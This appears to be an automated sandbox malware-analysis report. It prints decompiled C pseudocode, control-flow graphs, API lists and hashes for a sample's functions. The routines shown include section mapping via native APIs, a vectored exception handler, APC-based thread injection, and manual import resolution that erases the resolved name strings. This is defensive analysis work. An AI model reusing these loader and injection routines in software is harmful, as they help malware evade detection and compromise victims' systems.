                                                                                                                                        0x00401834
                                                                                                                                        0x00401835
                                                                                                                                        0x00401835
                                                                                                                                        0x004017fe
                                                                                                                                        0x0040184b

                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?,?), ref: 00401789
                                                                                                                                        • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0040179F
                                                                                                                                        • _snwprintf.NTDLL ref: 004017C4
                                                                                                                                        • CreateFileMappingW.KERNELBASE(000000FF,00404108,00000004,00000000,?,?), ref: 004017E9
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?), ref: 00401800
                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 00401814
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?), ref: 0040182C
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A), ref: 00401835
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?), ref: 0040183D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1724014008-0
                                                                                                                                        • Opcode ID: e7e3afbd12669e58cb121f1928e6193868cf1532ccb2f58477b3601ea12b3819
                                                                                                                                        • Instruction ID: e8a7653da7f220a92f75fec1035567f77f800dad67a15f7c1eb314f57ede4f00
                                                                                                                                        • Opcode Fuzzy Hash: e7e3afbd12669e58cb121f1928e6193868cf1532ccb2f58477b3601ea12b3819
                                                                                                                                        • Instruction Fuzzy Hash: 7A21A4B2600108BFD711BFA8DC88EAF77ACEB44355F108076F605F71E0D6749A418B68
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 6.84%

                                                                                                                                        Function 004021A7, Relevance: 6.0, APIs: 4, Instructions: 38memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 145 4021a7-4021b4 call 401a95 148 402205-402207 145->148 149 4021b6-4021d1 InitializeCriticalSection TlsAlloc 145->149 150 402208-40220c 148->150 151 4021f1-4021fb GetLastError 149->151 152 4021d3-4021e5 RtlAddVectoredExceptionHandler 149->152 151->150 154 4021fd-402203 call 4019a8 151->154 152->151 153 4021e7-4021ef 152->153 153->150 154->150
                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                        			E004021A7() {
				void* __esi;
				intOrPtr* _t7;
				long _t8;
				long _t11;
				struct _CRITICAL_SECTION* _t12;

				_t12 = E00401A95(0x28);
				if(_t12 == 0) {
					_t11 = 8;
					L7:
					return _t11;
				}
				_t1 = _t12 + 0x18; // 0x18
				_t7 = _t1;
				 *((intOrPtr*)(_t12 + 0x1c)) = _t7;
				 *_t7 = _t7;
				InitializeCriticalSection(_t12);
				_t8 = TlsAlloc();
				 *(_t12 + 0x24) = _t8;
				if(_t8 == 0xffffffff) {
					L4:
					_t11 = GetLastError();
					if(_t11 != 0) {
						E004019A8(_t12, _t12);
					}
					goto L7;
				}
				__imp__AddVectoredExceptionHandler(1, E00401CB1); // executed
				 *(_t12 + 0x20) = _t8;
				if(_t8 == 0) {
					goto L4;
				}
				 *0x404114 = _t12;
				_t11 = 0;
				goto L7;
			}








                                                                                                                                        0x004021b0
                                                                                                                                        0x004021b4
                                                                                                                                        0x00402207
                                                                                                                                        0x00402208
                                                                                                                                        0x0040220c
                                                                                                                                        0x0040220c
                                                                                                                                        0x004021b6
                                                                                                                                        0x004021b6
                                                                                                                                        0x004021ba
                                                                                                                                        0x004021bd
                                                                                                                                        0x004021bf
                                                                                                                                        0x004021c5
                                                                                                                                        0x004021ce
                                                                                                                                        0x004021d1
                                                                                                                                        0x004021f1
                                                                                                                                        0x004021f7
                                                                                                                                        0x004021fb
                                                                                                                                        0x004021fe
                                                                                                                                        0x004021fe
                                                                                                                                        0x00000000
                                                                                                                                        0x004021fb
                                                                                                                                        0x004021da
                                                                                                                                        0x004021e2
                                                                                                                                        0x004021e5
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x004021e7
                                                                                                                                        0x004021ed
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401A95: HeapAlloc.KERNEL32(00000000,?,004021B0,00000028,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 00401AA1
                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000000,00000028,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 004021BF
                                                                                                                                        • TlsAlloc.KERNEL32(?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 004021C5
                                                                                                                                        • RtlAddVectoredExceptionHandler.NTDLL(00000001,00401CB1,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 004021DA
                                                                                                                                        • GetLastError.KERNEL32(?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 004021F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Alloc$CriticalErrorExceptionHandlerHeapInitializeLastSectionVectored
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 628750512-0
                                                                                                                                        • Opcode ID: 413a39aa348dd9993e1ffb81996ea63a6f1ff9c789ceaf5c1447ad6097f9e7c8
                                                                                                                                        • Instruction ID: 47aa07a21df1032e2dc94d02296c1eaf06fc460d78e38b2a313ae0c1c180deaf
                                                                                                                                        • Opcode Fuzzy Hash: 413a39aa348dd9993e1ffb81996ea63a6f1ff9c789ceaf5c1447ad6097f9e7c8
                                                                                                                                        • Instruction Fuzzy Hash: 7DF0C8716416009BC3205F799E4DB077AA4BF80B11700033BB515F62E1DBB8C9458BA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.48%

                                                                                                                                        Function 00401900, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 157 401900-401962 NtCreateSection 158 401964-40196d call 401af0 157->158 159 401999-40199d 157->159 161 401972-401976 158->161 165 40199f-4019a5 159->165 163 401991-401997 161->163 164 401978-40198f memset 161->164 163->165 164->165
                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                        			E00401900(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401AF0(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                                                                        0x00401909
                                                                                                                                        0x00401910
                                                                                                                                        0x00401911
                                                                                                                                        0x00401912
                                                                                                                                        0x00401913
                                                                                                                                        0x00401914
                                                                                                                                        0x00401925
                                                                                                                                        0x00401929
                                                                                                                                        0x0040193d
                                                                                                                                        0x00401940
                                                                                                                                        0x00401943
                                                                                                                                        0x0040194a
                                                                                                                                        0x0040194d
                                                                                                                                        0x00401954
                                                                                                                                        0x00401957
                                                                                                                                        0x0040195a
                                                                                                                                        0x0040195d
                                                                                                                                        0x00401962
                                                                                                                                        0x0040199d
                                                                                                                                        0x00401964
                                                                                                                                        0x00401967
                                                                                                                                        0x0040196d
                                                                                                                                        0x00401972
                                                                                                                                        0x00401976
                                                                                                                                        0x00401994
                                                                                                                                        0x00401978
                                                                                                                                        0x0040197f
                                                                                                                                        0x0040198d
                                                                                                                                        0x0040198d
                                                                                                                                        0x00401976
                                                                                                                                        0x004019a5

                                                                                                                                        APIs
                                                                                                                                        • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74F44EE0,00000000,00000000,00000002), ref: 0040195D
                                                                                                                                          • Part of subcall function 00401AF0: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401972,00000002,00000000,?,?,00000000,?,?,00401972,00000000), ref: 00401B1D
                                                                                                                                        • memset.NTDLL ref: 0040197F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateViewmemset
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2533685722-2766056989
                                                                                                                                        • Opcode ID: 8441c7633daf46c5806a9e1c924941679b689f060eb131cee92b5228861c0d6c
                                                                                                                                        • Instruction ID: 4a8f97b3ffbc75101b963f371c5ead88a4c8780a47697150172b3eb5f380d046
                                                                                                                                        • Opcode Fuzzy Hash: 8441c7633daf46c5806a9e1c924941679b689f060eb131cee92b5228861c0d6c
                                                                                                                                        • Instruction Fuzzy Hash: 45211DB1D00209AFCB11DFA9C8849EEFBB9FF48354F10443AE645F3250D7349A458B64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 8.94%

                                                                                                                                        Function 00401AF0, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 219 401af0-401b22 NtMapViewOfSection 220 401b24-401b26 219->220 221 401b28 219->221 222 401b2c-401b2f 220->222 221->222
                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                        			E00401AF0(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                                                                        0x00401b02
                                                                                                                                        0x00401b08
                                                                                                                                        0x00401b16
                                                                                                                                        0x00401b1d
                                                                                                                                        0x00401b22
                                                                                                                                        0x00401b28
                                                                                                                                        0x00000000
                                                                                                                                        0x00401b29
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401972,00000002,00000000,?,?,00000000,?,?,00401972,00000000), ref: 00401B1D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SectionView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1323581903-0
                                                                                                                                        • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                        • Instruction ID: 155a4350041d930c457d0e5cb3bff2c8d54c3b955150682a38563a2be07dce39
                                                                                                                                        • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                        • Instruction Fuzzy Hash: 25F012B590020CBFDB119FA5CC85CAFBBBDEB44354B10493AF552E10A0D630AE089A60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        Function 004010F9, Relevance: 19.6, APIs: 13, Instructions: 106threadsynchronizationinjectionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                        			E004010F9(void* __ecx) {
				void* _v32;
				long _v36;
				long _v40;
				long _v44;
				long _t13;
				long _t14;
				void* _t17;
				long _t20;
				long _t21;
				void* _t28;
				intOrPtr _t30;
				long _t35;
				intOrPtr _t36;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;

				_t37 = __ecx;
				_t13 = E00401498();
				_v36 = _t13;
				if(_t13 != 0) {
					L19:
					return _t13;
				}
				_t13 = E00401EFB(__ecx); // executed
				_v36 = _t13;
				if(_t13 != 0) {
					goto L19;
				}
				_t14 = E0040212A(__ecx); // executed
				_v36 = _t14;
				if(_t14 != 0) {
					L17:
					_t13 = _v36;
					if(_t13 == 0xffffffff) {
						_t13 = GetLastError();
					}
					goto L19;
				}
				if(E00401077(_t37,  &_v32) != 0) {
					 *0x4040f8 = 0;
					L9:
					_t17 = CreateThread(0, 0, __imp__SleepEx,  *0x404100, 0, 0); // executed
					_t46 = _t17;
					if(_t46 == 0) {
						L16:
						_v40 = GetLastError();
						goto L17;
					}
					_t20 = QueueUserAPC(E00401D33, _t46,  &_v32); // executed
					if(_t20 == 0) {
						_t35 = GetLastError();
						TerminateThread(_t46, _t35);
						CloseHandle(_t46);
						_t46 = 0;
						SetLastError(_t35);
					}
					if(_t46 == 0) {
						goto L16;
					} else {
						_t21 = WaitForSingleObject(_t46, 0xffffffff);
						_v44 = _t21;
						if(_t21 == 0) {
							GetExitCodeThread(_t46,  &_v44);
						}
						CloseHandle(_t46);
						goto L17;
					}
				}
				_t36 = _v32;
				_t47 = __imp__GetLongPathNameW;
				_t28 =  *_t47(_t36, 0, 0); // executed
				_t42 = _t28;
				if(_t42 == 0) {
					L7:
					 *0x4040f8 = _t36;
					goto L9;
				}
				_t7 = _t42 + 2; // 0x2
				_t30 = E00401A95(_t42 + _t7);
				 *0x4040f8 = _t30;
				if(_t30 == 0) {
					goto L7;
				}
				 *_t47(_t36, _t30, _t42); // executed
				E00401F77(_t36);
				goto L9;
			}



















                                                                                                                                        0x004010f9
                                                                                                                                        0x00401105
                                                                                                                                        0x0040110e
                                                                                                                                        0x00401112
                                                                                                                                        0x0040121f
                                                                                                                                        0x00401225
                                                                                                                                        0x00401225
                                                                                                                                        0x00401118
                                                                                                                                        0x0040111f
                                                                                                                                        0x00401123
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00401129
                                                                                                                                        0x00401130
                                                                                                                                        0x00401134
                                                                                                                                        0x00401210
                                                                                                                                        0x00401210
                                                                                                                                        0x00401217
                                                                                                                                        0x00401219
                                                                                                                                        0x00401219
                                                                                                                                        0x00000000
                                                                                                                                        0x00401217
                                                                                                                                        0x00401146
                                                                                                                                        0x00401185
                                                                                                                                        0x0040118b
                                                                                                                                        0x0040119d
                                                                                                                                        0x004011a3
                                                                                                                                        0x004011a7
                                                                                                                                        0x00401206
                                                                                                                                        0x0040120c
                                                                                                                                        0x00000000
                                                                                                                                        0x0040120c
                                                                                                                                        0x004011b4
                                                                                                                                        0x004011c2
                                                                                                                                        0x004011ca
                                                                                                                                        0x004011ce
                                                                                                                                        0x004011d5
                                                                                                                                        0x004011d8
                                                                                                                                        0x004011da
                                                                                                                                        0x004011da
                                                                                                                                        0x004011e2
                                                                                                                                        0x00000000
                                                                                                                                        0x004011e4
                                                                                                                                        0x004011e7
                                                                                                                                        0x004011ef
                                                                                                                                        0x004011f3
                                                                                                                                        0x004011fb
                                                                                                                                        0x004011fb
                                                                                                                                        0x00401202
                                                                                                                                        0x00000000
                                                                                                                                        0x00401202
                                                                                                                                        0x004011e2
                                                                                                                                        0x00401148
                                                                                                                                        0x0040114e
                                                                                                                                        0x00401155
                                                                                                                                        0x00401157
                                                                                                                                        0x0040115b
                                                                                                                                        0x0040117d
                                                                                                                                        0x0040117d
                                                                                                                                        0x00000000
                                                                                                                                        0x0040117d
                                                                                                                                        0x0040115d
                                                                                                                                        0x00401162
                                                                                                                                        0x00401169
                                                                                                                                        0x0040116e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00401173
                                                                                                                                        0x00401176
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401498: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040110A,?,00000000), ref: 004014A7
                                                                                                                                          • Part of subcall function 00401498: GetVersion.KERNEL32(?,00000000), ref: 004014B6
                                                                                                                                          • Part of subcall function 00401498: GetCurrentProcessId.KERNEL32(?,00000000), ref: 004014C5
                                                                                                                                          • Part of subcall function 00401498: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 004014DE
                                                                                                                                          • Part of subcall function 0040212A: StrStrIA.KERNELBASE(00000000,00000000,?,00000000,?,?,00000000,?,?,?,0040112E,?,00000000), ref: 00402181
                                                                                                                                          • Part of subcall function 0040212A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,0040112E,?,00000000), ref: 0040219B
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00401219
                                                                                                                                          • Part of subcall function 00401077: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,?,00000000,?,?,?,00401144,?,?,00000000), ref: 004010A0
                                                                                                                                        • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401155
                                                                                                                                        • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401173
                                                                                                                                          • Part of subcall function 00401F77: HeapFree.KERNEL32(00000000,?,00401A16,?,00000000,?,?,00402203,00000000,?,?,00401F0D,?,00000000), ref: 00401F83
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 0040119D
                                                                                                                                        • QueueUserAPC.KERNELBASE(00401D33,00000000,?,?,00000000), ref: 004011B4
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004011C4
                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004011CE
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004011D5
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 004011DA
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 004011E7
                                                                                                                                        • GetExitCodeThread.KERNEL32(00000000,?,?,00000000), ref: 004011FB
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401202
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00401206
                                                                                                                                          • Part of subcall function 00401A95: HeapAlloc.KERNEL32(00000000,?,004021B0,00000028,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 00401AA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$HeapNameThread$CloseCreateFreeHandleLongPathProcess$AllocCodeCurrentEventExitFileModuleObjectOpenQueueSingleTerminateUserVersionWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2300755891-0
                                                                                                                                        • Opcode ID: 62e79a8864fe4bc6f26208144dfe6b28918a0bb245ec89afcfe40c88ff1a4dc3
                                                                                                                                        • Instruction ID: bb683312699e85ed37c1b69070dc8026002bfd6335ed63ea75abe30ddc4dff10
                                                                                                                                        • Opcode Fuzzy Hash: 62e79a8864fe4bc6f26208144dfe6b28918a0bb245ec89afcfe40c88ff1a4dc3
                                                                                                                                        • Instruction Fuzzy Hash: B631A371401611ABC721EFB59D48C6B7EACEE89751711063FFA25F22A0E738C90587BE
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 8.94%

                                                                                                                                        Function 0040200D, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101librarystringloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 44 40200d-402022 45 402123-402127 44->45 46 402028-402034 44->46 47 402122 46->47 48 40203a 46->48 47->45 49 40203b-40204a LoadLibraryA 48->49 50 402050-40206e lstrlenA memset 49->50 51 40211a 49->51 52 402070-402074 50->52 53 40207a-402081 50->53 54 402121 51->54 52->53 55 402107-402112 52->55 53->55 56 402087-40208e 53->56 54->47 55->49 57 402118 55->57 58 402090 56->58 57->54 59 402092-402095 58->59 60 402097-402099 58->60 61 4020b3-4020b8 59->61 62 4020ab-4020b0 60->62 63 40209b-4020a5 60->63 65 4020ba 61->65 66 4020be-4020cd GetProcAddress 61->66 62->61 63->62 64 4020a7-4020a9 63->64 64->61 65->66 67 4020fd 66->67 68 4020cf-4020d1 66->68 69 402104 67->69 70 4020d3-4020e6 lstrlenA memset 68->70 71 4020e9-4020f9 68->71 69->55 70->71 71->58 72 4020fb 71->72 72->69
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0040200D(void* __ebx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed short _v16;
				struct HINSTANCE__* _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _t33;
				intOrPtr _t35;
				struct HINSTANCE__* _t36;
				intOrPtr _t39;
				CHAR* _t43;
				_Unknown_base(*)()* _t44;
				void* _t51;
				intOrPtr _t52;
				signed short _t53;
				intOrPtr* _t56;
				signed short _t58;
				CHAR* _t59;
				CHAR* _t61;
				signed short* _t63;
				void* _t64;
				signed short _t71;

				_t51 = __ebx;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				_v12 = _v12 & 0x00000000;
				if(_t33 == 0) {
					L28:
					return _v12;
				}
				_t56 = _t33 + __ebx;
				_t35 =  *((intOrPtr*)(_t56 + 0xc));
				_v8 = _t56;
				if(_t35 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t61 = _t35 + _t51;
					_t36 = LoadLibraryA(_t61); // executed
					_v20 = _t36;
					if(_t36 == 0) {
						break;
					}
					_v16 = _v16 & 0x00000000;
					memset(_t61, 0, lstrlenA(_t61));
					_t52 =  *_t56;
					_t39 =  *((intOrPtr*)(_t56 + 0x10));
					_t64 = _t64 + 0xc;
					if(_t52 != 0) {
						L6:
						_t63 = _t52 + _t51;
						_t53 =  *_t63;
						if(_t53 == 0) {
							L23:
							_t35 =  *((intOrPtr*)(_t56 + 0x20));
							_t56 = _t56 + 0x14;
							_v8 = _t56;
							if(_t35 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v24 = _t39 - _t63 + _t51;
						_t71 = _t53;
						L8:
						L8:
						if(_t71 < 0) {
							if(_t53 < _t51 || _t53 >=  *((intOrPtr*)(_a4 + 0x50)) + _t51) {
								_t58 = 0;
								_v16 =  *_t63 & 0x0000ffff;
							} else {
								_t58 = _t53;
							}
						} else {
							_t58 = _t53 + _t51;
						}
						_t19 = _t58 + 2; // 0x2
						_t43 = _t19;
						if(_t58 == 0) {
							_t43 = _v16 & 0x0000ffff;
						}
						_t44 = GetProcAddress(_v20, _t43);
						_v28 = _t44;
						if(_t44 == 0) {
							goto L21;
						}
						if(_t58 != 0) {
							_t59 = _t58 + 2;
							memset(_t59, 0, lstrlenA(_t59));
							_t64 = _t64 + 0xc;
						}
						 *(_v24 + _t63) = _v28;
						_t63 =  &(_t63[2]);
						_t53 =  *_t63;
						if(_t53 != 0) {
							goto L8;
						} else {
							L22:
							_t56 = _v8;
							goto L23;
						}
						L21:
						_v12 = 0x7f;
						goto L22;
					}
					_t52 = _t39;
					if(_t39 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v12 = 0x7e;
				goto L26;
			}

























                                                                                                                                        0x0040200d
                                                                                                                                        0x00402016
                                                                                                                                        0x0040201c
                                                                                                                                        0x00402022
                                                                                                                                        0x00402123
                                                                                                                                        0x00402127
                                                                                                                                        0x00402127
                                                                                                                                        0x00402029
                                                                                                                                        0x0040202c
                                                                                                                                        0x00402031
                                                                                                                                        0x00402034
                                                                                                                                        0x00402122
                                                                                                                                        0x00000000
                                                                                                                                        0x00402122
                                                                                                                                        0x0040203b
                                                                                                                                        0x0040203b
                                                                                                                                        0x0040203f
                                                                                                                                        0x00402047
                                                                                                                                        0x0040204a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00402050
                                                                                                                                        0x0040205f
                                                                                                                                        0x00402064
                                                                                                                                        0x00402066
                                                                                                                                        0x00402069
                                                                                                                                        0x0040206e
                                                                                                                                        0x0040207a
                                                                                                                                        0x0040207a
                                                                                                                                        0x0040207d
                                                                                                                                        0x00402081
                                                                                                                                        0x00402107
                                                                                                                                        0x00402107
                                                                                                                                        0x0040210a
                                                                                                                                        0x0040210f
                                                                                                                                        0x00402112
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00402121
                                                                                                                                        0x00000000
                                                                                                                                        0x00402121
                                                                                                                                        0x0040208b
                                                                                                                                        0x0040208e
                                                                                                                                        0x00000000
                                                                                                                                        0x00402090
                                                                                                                                        0x00402090
                                                                                                                                        0x00402099
                                                                                                                                        0x004020ae
                                                                                                                                        0x004020b0
                                                                                                                                        0x004020a7
                                                                                                                                        0x004020a7
                                                                                                                                        0x004020a7
                                                                                                                                        0x00402092
                                                                                                                                        0x00402092
                                                                                                                                        0x00402092
                                                                                                                                        0x004020b5
                                                                                                                                        0x004020b5
                                                                                                                                        0x004020b8
                                                                                                                                        0x004020ba
                                                                                                                                        0x004020ba
                                                                                                                                        0x004020c2
                                                                                                                                        0x004020ca
                                                                                                                                        0x004020cd
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x004020d1
                                                                                                                                        0x004020d3
                                                                                                                                        0x004020e1
                                                                                                                                        0x004020e6
                                                                                                                                        0x004020e6
                                                                                                                                        0x004020ef
                                                                                                                                        0x004020f2
                                                                                                                                        0x004020f5
                                                                                                                                        0x004020f9
                                                                                                                                        0x00000000
                                                                                                                                        0x004020fb
                                                                                                                                        0x00402104
                                                                                                                                        0x00402104
                                                                                                                                        0x00000000
                                                                                                                                        0x00402104
                                                                                                                                        0x004020fd
                                                                                                                                        0x004020fd
                                                                                                                                        0x00000000
                                                                                                                                        0x004020fd
                                                                                                                                        0x00402072
                                                                                                                                        0x00402074
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00402074
                                                                                                                                        0x0040211a
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,00000000,?,?,?,00000002), ref: 0040203F
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00402055
                                                                                                                                        • memset.NTDLL ref: 0040205F
                                                                                                                                        • GetProcAddress.KERNEL32(?,00000002), ref: 004020C2
                                                                                                                                        • lstrlenA.KERNEL32(-00000002), ref: 004020D7
                                                                                                                                        • memset.NTDLL ref: 004020E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlenmemset$AddressLibraryLoadProc
                                                                                                                                        • String ID: ~
                                                                                                                                        • API String ID: 1986585659-1707062198
